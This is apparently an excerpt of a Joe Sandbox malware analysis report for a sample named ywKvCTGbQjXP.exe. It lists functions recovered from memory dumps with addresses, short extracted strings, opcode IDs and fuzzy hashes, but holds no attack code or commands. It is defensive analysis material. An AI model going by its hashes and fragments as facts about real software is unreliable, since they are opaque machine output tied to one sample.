Instruction Fuzzy Hash: 30D012F2418160DFC300CB55DDD5C883FF0BE1E301715098AD0054F222D330A412DB50

Function 07A2C2F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a1950b75041cb810c973e66be7eb61277e0bed4d908152c956e3b33c1a3707
Instruction ID: 4cc6539b01578549b0fec15e493e262bd694b29efed4873e14cd91f9a229730f
Opcode Fuzzy Hash: f8a1950b75041cb810c973e66be7eb61277e0bed4d908152c956e3b33c1a3707
Instruction Fuzzy Hash: 44B092F402C22CC2875433DD202913D363C2147A30F000012E13B308000D0114636F72

Function 07A2770C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d16cae8aea617b58ec796f8f4c90de2b1793b894af5c1cdcb103276968accf95
Instruction ID: b02277c813b1000bbd5f8df7b67cda36e9533fef4f3c5bd74f1807d4bfa6f3c1
Opcode Fuzzy Hash: d16cae8aea617b58ec796f8f4c90de2b1793b894af5c1cdcb103276968accf95
Instruction Fuzzy Hash: 58B012BB1E9510F344007BAC4E40A3AD451EBF2B00F00CD11771A500388631856AF717

Function 07A2B9C1 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107eee30a8e864eed5900222b42a0ce284afd9c5d263595e71d0b9df43449697
Instruction ID: 1b56f50bbddc25340665c63253067c93d361dc4c9659ee5c0e36a2f5008265cb
Opcode Fuzzy Hash: 107eee30a8e864eed5900222b42a0ce284afd9c5d263595e71d0b9df43449697
Instruction Fuzzy Hash: 20C04CF0BA0229BFEB158A55DE46D6C777A7B09A00F220514F6226A194E76045029660

Function 07A26690 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1780832076.0000000007A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a20000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68cbacc4a52a80703e2a0feec1e31ea2100de089ebe378fcc84bfeb3c2b64942
Instruction ID: c7cd0d06a2d428ce6915aec2c18088eae733694270dd1060ec8ba46c03982ee4
Opcode Fuzzy Hash: 68cbacc4a52a80703e2a0feec1e31ea2100de089ebe378fcc84bfeb3c2b64942
Instruction Fuzzy Hash: 8CA012B002B21CC64108114CA1090367B3C1001104F400400EA2A04800565E3422504E

Analysis Process: ywKvCTGbQjXP.exePID: 7676, Parent PID: 7384COMMON

Executed Functions

Function 01256730 Relevance: 6.7, Strings: 5, Instructions: 465COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01256988
(o^q, xrefs: 01256CA5
(o^q, xrefs: 0125697A
,bq, xrefs: 01256A00
,bq, xrefs: 012569F2

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: e08ff25d81933b9b4382324b547861a4ea223baa87e7a63a5bf3af9002fd26b5
Instruction ID: 89c6c9249a01b533edcae468f14bc89a814074d645832adcd7164fc8de964799
Opcode Fuzzy Hash: e08ff25d81933b9b4382324b547861a4ea223baa87e7a63a5bf3af9002fd26b5
Instruction Fuzzy Hash: 9D128E70A10209DFDB55CFA9C9C8AADBBF6FF88305F548569E905AB261EB30DC41CB50

Function 0125B328 Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

LjAp, xrefs: 0125B6CF
PH^q, xrefs: 0125B747
0oAp, xrefs: 0125B562
LjAp, xrefs: 0125B6E5
PH^q, xrefs: 0125B758

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 203f8686222bf38dd16f383eaf6baaae19b0ffe2db7ea0452540443cb14e741a
Instruction ID: 9adbd1cd70a1803dd92da57e9a4a0ef052d72b84669d4e68cabece09dd953d64
Opcode Fuzzy Hash: 203f8686222bf38dd16f383eaf6baaae19b0ffe2db7ea0452540443cb14e741a
Instruction Fuzzy Hash: 83E10775E10259CFDB54CFA9C994A9DBFB2FF48310F1580A9E919AB362DB30A841CF50

Function 0125BEB0 Relevance: 6.4, Strings: 5, Instructions: 199COMMON

Download Yara Rule

Strings

LjAp, xrefs: 0125C08F
PH^q, xrefs: 0125C118
0oAp, xrefs: 0125BF22
LjAp, xrefs: 0125C0A5
PH^q, xrefs: 0125C107

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 8bb13cf87ebdb69e1b0691a0a4af970433cbb4d5fe6d30c8965ecfea46a68bfa
Instruction ID: f9a487a2df66257cf85c2bf8040a1de72ba4be86119dcdf87d7f52da867fea02
Opcode Fuzzy Hash: 8bb13cf87ebdb69e1b0691a0a4af970433cbb4d5fe6d30c8965ecfea46a68bfa
Instruction Fuzzy Hash: 7D91DA74E10219CFDB54DFAAD984A9DBBF2BF89300F14C069E909A7365EB309941CF10

Function 0125C190 Relevance: 6.4, Strings: 5, Instructions: 198COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0125C202
PH^q, xrefs: 0125C3E7
LjAp, xrefs: 0125C385
LjAp, xrefs: 0125C36F
PH^q, xrefs: 0125C3F8

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 3517a40a2720f61eb124d1f953e1e0d1495f8624e3f1627a79dadd6495b04884
Instruction ID: 36188883f070ad45bc6f422f99561b9b3248c4546f63f0e70e6dc21da7c9af06
Opcode Fuzzy Hash: 3517a40a2720f61eb124d1f953e1e0d1495f8624e3f1627a79dadd6495b04884
Instruction Fuzzy Hash: 6A91D674E11218DFDB54DFAAD984A9DBBF2BF89300F14C069E819AB365EB709941CF10

Function 0125BBD2 Relevance: 6.4, Strings: 5, Instructions: 192COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0125BE27
PH^q, xrefs: 0125BE38
0oAp, xrefs: 0125BC42
LjAp, xrefs: 0125BDC5
LjAp, xrefs: 0125BDAF

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 27c6f896e2619a8f1f939638e965e9128a0392efd71b5426e0f5a416146036b6
Instruction ID: b10609cfbde9d4042a61ad1d8c5ff7131c94ff6cf9f34620bda00bd0710f290d
Opcode Fuzzy Hash: 27c6f896e2619a8f1f939638e965e9128a0392efd71b5426e0f5a416146036b6
Instruction Fuzzy Hash: 1481D274E11208CFDB54DFAAD884A9DBBF2BF89300F14C069E909AB365DB749981CF11

Function 01254AD9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

LjAp, xrefs: 01254CCE
PH^q, xrefs: 01254D30
PH^q, xrefs: 01254D41
LjAp, xrefs: 01254CB8
0oAp, xrefs: 01254B4A

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 9d4d09ade1b14fbb6f7a2381cedcaa5bbdbe93fbcfdff6ee34bf78269e82cc39
Instruction ID: 0c2e6413825c5632c55b077f147ec986bf0272636e3653062e2d041bf784a600
Opcode Fuzzy Hash: 9d4d09ade1b14fbb6f7a2381cedcaa5bbdbe93fbcfdff6ee34bf78269e82cc39
Instruction Fuzzy Hash: 4881C674E10258DFDB54DFA9D984A9DFBF2BF88301F148069E819AB365EB349981CF10

Function 0125C470 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0125C4E2
LjAp, xrefs: 0125C64F
LjAp, xrefs: 0125C665
PH^q, xrefs: 0125C6C7
PH^q, xrefs: 0125C6D8

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 0e18b10cc4dafe096846f82d35c5e190baa60431b5f2e55ae4a4e07bd327b5d1
Instruction ID: e878ab4dfcb90bf93d88861aaf0cc1e8b80e14fa85319a06fc249146531ed2fb
Opcode Fuzzy Hash: 0e18b10cc4dafe096846f82d35c5e190baa60431b5f2e55ae4a4e07bd327b5d1
Instruction Fuzzy Hash: DE81C874E10218CFDB54DFAAD984A9DBBF2BF88300F14D469E819AB365EB349941CF10

Function 0125C751 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjAp, xrefs: 0125C945
PH^q, xrefs: 0125C9B8
0oAp, xrefs: 0125C7C2
PH^q, xrefs: 0125C9A7
LjAp, xrefs: 0125C92F

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d9699b225a202cd88b69700586eece88792bea5ed0a66d359be86868c88aa360
Instruction ID: c9e39c78d41dbe9a04f050aa066a86bdf64250bbd57bbf830684417b2a38563b
Opcode Fuzzy Hash: d9699b225a202cd88b69700586eece88792bea5ed0a66d359be86868c88aa360
Instruction Fuzzy Hash: 3A81D974E11219CFDB54DFAAD984A9DBBF2BF89310F14C069E809AB365EB349941CF10

Function 0125CA31 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

0oAp, xrefs: 0125CAA2
PH^q, xrefs: 0125CC98
LjAp, xrefs: 0125CC25
LjAp, xrefs: 0125CC0F
PH^q, xrefs: 0125CC87

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 65cf2d432a35ba80ea65598a42c671ca4e77d61079f10910d77510eddcc1bb5b
Instruction ID: c7b4e1538ab44db82fe20b7da1b84119dbe9538503640acf81be36319ce057cd
Opcode Fuzzy Hash: 65cf2d432a35ba80ea65598a42c671ca4e77d61079f10910d77510eddcc1bb5b
Instruction Fuzzy Hash: AA81C874E11218CFDB54DFAAD994A9DBBF2BF88300F14D069E809AB365EB749941CF10

Function 01259540 Relevance: 6.1, Strings: 4, Instructions: 1132COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01259564
4'^q, xrefs: 0125966C
(o^q, xrefs: 01259C78
4'^q, xrefs: 0125A273

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (o^q$4'^q$4'^q$4'^q
API String ID: 0-183542557
Opcode ID: acbd1ee302a07b690d87df95807398d83de7bf13a40c796de6edd7ce9e821caa
Instruction ID: 1b50f09fde486f3a1e956454a1c6f328d1685abf58c754da8cc63a88a4ea094e
Opcode Fuzzy Hash: acbd1ee302a07b690d87df95807398d83de7bf13a40c796de6edd7ce9e821caa
Instruction Fuzzy Hash: F6A28F71A1020ACFCF55CF68C885AAEBBF6FF88304F148559E906DB262D735E981CB51

Function 0125B4F2 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0125B747
0oAp, xrefs: 0125B562
PH^q, xrefs: 0125B758

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 0oAp$PH^q$PH^q
API String ID: 0-4194141968
Opcode ID: e2ef799ab68a5eea85a44d589b71682548bf60540fad184776b9f2581f7cd295
Instruction ID: 0129e939482e049563aa59d009d01fce290223eba24a6876b65d53267674432d
Opcode Fuzzy Hash: e2ef799ab68a5eea85a44d589b71682548bf60540fad184776b9f2581f7cd295
Instruction Fuzzy Hash: 7661C575E10209DFDB58DFAAD984A9DBBF2BF88300F14C469E815AB365DB349941CF10

Function 01256108 Relevance: 3.0, Strings: 2, Instructions: 512COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01256642
Hbq, xrefs: 0125650E

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: baf6945eb7bdc2babdb03d1d8ad149ade0282807afc1ba8e8bb52b3123c859f3
Instruction ID: e547007e30d1b94ee4f3d99130ccd6eb2b126632c164146d46796fad25e6e217
Opcode Fuzzy Hash: baf6945eb7bdc2babdb03d1d8ad149ade0282807afc1ba8e8bb52b3123c859f3
Instruction Fuzzy Hash: 2C12BE70A002199FDB58DF69C894BAEBBF6FF88300F148569E905EB391DB349D45CB90

Function 01253570 Relevance: 2.9, Strings: 2, Instructions: 420COMMON

Download Yara Rule

Strings

$^q, xrefs: 01253596
Xbq, xrefs: 012535AF

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 959597e9eb7c3fe97d0a5635d069873205a6531211249c898666f8efbde92741
Instruction ID: 0739e85fbe3e1e3392a716b85b3ef426a657cf011db23e20cca8048dffe6b29f
Opcode Fuzzy Hash: 959597e9eb7c3fe97d0a5635d069873205a6531211249c898666f8efbde92741
Instruction Fuzzy Hash: 0CF16D75E11258CFDB48DFB9D8946AEBBB2BF88310B14852AE846E7354DF349C02CB51

Function 01256E58 Relevance: 10.5, Strings: 8, Instructions: 476COMMON

Download Yara Rule

Strings

,bq, xrefs: 012572F8
(o^q, xrefs: 01256F51
(o^q, xrefs: 01257377
(o^q, xrefs: 01256F7D
(o^q, xrefs: 01257367
(o^q, xrefs: 01256E96
,bq, xrefs: 01257308
(o^q, xrefs: 0125701A

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: a57b163fc565758a3dce1d1499a9e2f5c3369d6a55702a469e768d0b2ba890a2
Instruction ID: b205123a4fe4996b02750775728ed3b254615ba52d095e8e930424dee4286356
Opcode Fuzzy Hash: a57b163fc565758a3dce1d1499a9e2f5c3369d6a55702a469e768d0b2ba890a2
Instruction Fuzzy Hash: 53127A30A502099FCB55CF69C984AAEBBF2FF88314F548599E909DB362DB31ED41CB50

Function 01252150 Relevance: 5.6, Strings: 4, Instructions: 643COMMON

Download Yara Rule

Strings

Xbq, xrefs: 0125220E
Xbq, xrefs: 01252314
Xbq, xrefs: 01252248
Xbq, xrefs: 012522C7

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 63933c58e2a0b5fabebe08bfec0e51fe3e77ed8e070b3cadcfdf23cc832301ea
Instruction ID: 486cdd1a0dc4803256238220730781ad7620c21a2f19c096a5c7a7faf5a865fe
Opcode Fuzzy Hash: 63933c58e2a0b5fabebe08bfec0e51fe3e77ed8e070b3cadcfdf23cc832301ea
Instruction Fuzzy Hash: E0322CF3D24B118BCB068E74CDCA2747B70A766220FF9826D8556E52C9F27EED418781

Function 012577F0 Relevance: 3.2, Strings: 2, Instructions: 706COMMON

Download Yara Rule

Strings

$^q, xrefs: 01258314
$^q, xrefs: 01258337

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 4458e0acfefc5ae603c334af976303e6c22965f89ed679d74651f02711cd8979
Instruction ID: 9dad983c4e8aec1b1bd964377104815c5e927ec968c382ecac993e9ab6db1b5c
Opcode Fuzzy Hash: 4458e0acfefc5ae603c334af976303e6c22965f89ed679d74651f02711cd8979
Instruction Fuzzy Hash: AA528674A00258CFEB54DBA4CCA4BAEBB76EF84300F1081A9D10A6B365DF359E85DF51

Function 012587E9 Relevance: 2.8, Strings: 2, Instructions: 347COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01258811
4'^q, xrefs: 01258837

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 69c9d82a21b2afbb6cae80e668d93537067d22c784cbf5951b2218080dd7fecf
Instruction ID: e7b0e8a14584f9d1d2ffad17dff8083d5b4c127fc36949961947b7837387c4c7
Opcode Fuzzy Hash: 69c9d82a21b2afbb6cae80e668d93537067d22c784cbf5951b2218080dd7fecf
Instruction Fuzzy Hash: 54B186707741028FEB559A2EC9D9B393B9AEF85604F144466EA06CF3A1EEF5CC42C742

Function 012556A8 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

Hbq, xrefs: 012557C6
Hbq, xrefs: 01255793

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: e96887d94eb5ccb86d163ae220e59aaa0ef96da0a7ee33682fa5b6bf6864cd7d
Instruction ID: 2c9b57878d4f1f987e279815e6d1580cf92fbbd2b8a44044cf87c2a65aee81e6
Opcode Fuzzy Hash: e96887d94eb5ccb86d163ae220e59aaa0ef96da0a7ee33682fa5b6bf6864cd7d
Instruction Fuzzy Hash: 7AB1DD307142419FDB5A9F39C898B3A7BE6AF89310F144969EA06CB391DF79CC41CB91

Function 01255C08 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,bq, xrefs: 01255CE8
,bq, xrefs: 01255CDE

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 015ce765ae7d74fb0e910e8a4ba363973c7df9efabee11a37ab68d0bbcc71413
Instruction ID: c76d27de46c9541f64c1433cc1eacba3b90ce63714a7d3148df1e8cef3f0e0e4
Opcode Fuzzy Hash: 015ce765ae7d74fb0e910e8a4ba363973c7df9efabee11a37ab68d0bbcc71413
Instruction Fuzzy Hash: 9E81A035A21106CFCB94CF6DC8C8AAABBF6BF89310B158569DA05DB365D731E842CB50

Function 01250C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01250E5E

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 928759951f60ded9b3989b3d86496f342ccd54ef3cf54111b9109dde13d69a0d
Instruction ID: 4e1b4ae934f24a1e52e4e3711d89bb7672239d1eb5afad50e32ba8ceb1060eab
Opcode Fuzzy Hash: 928759951f60ded9b3989b3d86496f342ccd54ef3cf54111b9109dde13d69a0d
Instruction Fuzzy Hash: 5422A875D4021ACFCB54EF64E999A9DBBB1FF48301F1086A9D809A7368EB306D85CF50

Function 01250CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01250E5E

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: a16b895b0bceab7a7374d04774dd9ea26ae57a27ee2009d479845bac5e469c65
Instruction ID: b082d9d369289bef7980f32c5e23288ed9e4f3b05d6964201000acfc55c8bd97
Opcode Fuzzy Hash: a16b895b0bceab7a7374d04774dd9ea26ae57a27ee2009d479845bac5e469c65
Instruction Fuzzy Hash: 5E22A775D40219CFCB54EF64E999A9DBBB1FF48301F108AA9D809A7368EB306D85CF50

Function 0125A650 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0125A7D9

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: fc4848f5b97cce67672ffd1f3be294c46a932e32b6de739ce55879d91b0c66c3
Instruction ID: 69f2c9cb95f11ea1c69f9838568cec0f98bbe64b07cb62e0c0b89603a8c31509
Opcode Fuzzy Hash: fc4848f5b97cce67672ffd1f3be294c46a932e32b6de739ce55879d91b0c66c3
Instruction Fuzzy Hash: 57410F31B002049FCB09AF79D8596AE7BF6BFC8311F244569EA06E7391CE358C02CB90

Function 0125A818 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3afea4b36f10ba0a6b8084163fd8a08c65643a9165dd426e4684ffa620cf3cc4
Instruction ID: 3a7aa96f924923999975e8eaaecd8f2ca92cfb727de696b763c5ccc54772323b
Opcode Fuzzy Hash: 3afea4b36f10ba0a6b8084163fd8a08c65643a9165dd426e4684ffa620cf3cc4
Instruction Fuzzy Hash: 0BF14C75A10215CFCB44CF6DC8C99ADBBF6BF98310B1A8559EA05AB361DB31EC41CB90

Function 01257438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7d36d4e3557395cc95c0f0ed4d759bbf28bcdfbf8b38b73ad9da81cc5d092d
Instruction ID: 13baace83fab1b83bbfdc30e1bb1f22129958db61ecee9f4ed83f1456ec25e0a
Opcode Fuzzy Hash: 0c7d36d4e3557395cc95c0f0ed4d759bbf28bcdfbf8b38b73ad9da81cc5d092d
Instruction Fuzzy Hash: 49714A347602468FDB55DF2DC898AA97BE5AF49204F9500A9EE16CB3B1DB70DC41CBA0

Function 0125CEC7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0237702134fea79bc60f4f0bf62ebac242f9f19b47b6921b5e29f632120c34
Instruction ID: 9c3844996db816d28536b6cdf1a23f0605580af8438f37a03e13052d1d091fbe
Opcode Fuzzy Hash: ce0237702134fea79bc60f4f0bf62ebac242f9f19b47b6921b5e29f632120c34
Instruction Fuzzy Hash: C751C470AA57478FC3042F22A6BD67A7BB0FB5F7137496E50F10F86461CB3064A5DA10

Function 0125CED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0069d5468b58e0f354ad889e097fd518568ee1b598afdde8723bf8f22e4d8598
Instruction ID: a147ccb38ecb55bb927bc9ae055d6a1de943102bac9ffb1ea28fdef68dca70ab
Opcode Fuzzy Hash: 0069d5468b58e0f354ad889e097fd518568ee1b598afdde8723bf8f22e4d8598
Instruction Fuzzy Hash: 2451C270AA17478FC3042F22AAAD63A7BB4FB5F7177496E50F10F86465CB3068A5DA10

Function 0125CD10 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9e89dd10dfaee902acc2f51561e777cf52944acd924d295df00aca701a923e
Instruction ID: 344470d308ca7f4e50baf3818d5fcd30b6a9add9e1bc3ec2b22318f76dbc0766
Opcode Fuzzy Hash: dd9e89dd10dfaee902acc2f51561e777cf52944acd924d295df00aca701a923e
Instruction Fuzzy Hash: CD518474E01218DFDB58DFA9D9949DDBBF2BF89300F24816AE419AB365DB30A901CF50

Function 01253908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1883204442.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1250000_ywKvCTGbQjXP.jbxd

Similarity

API ID:
String ID:
API String ID:
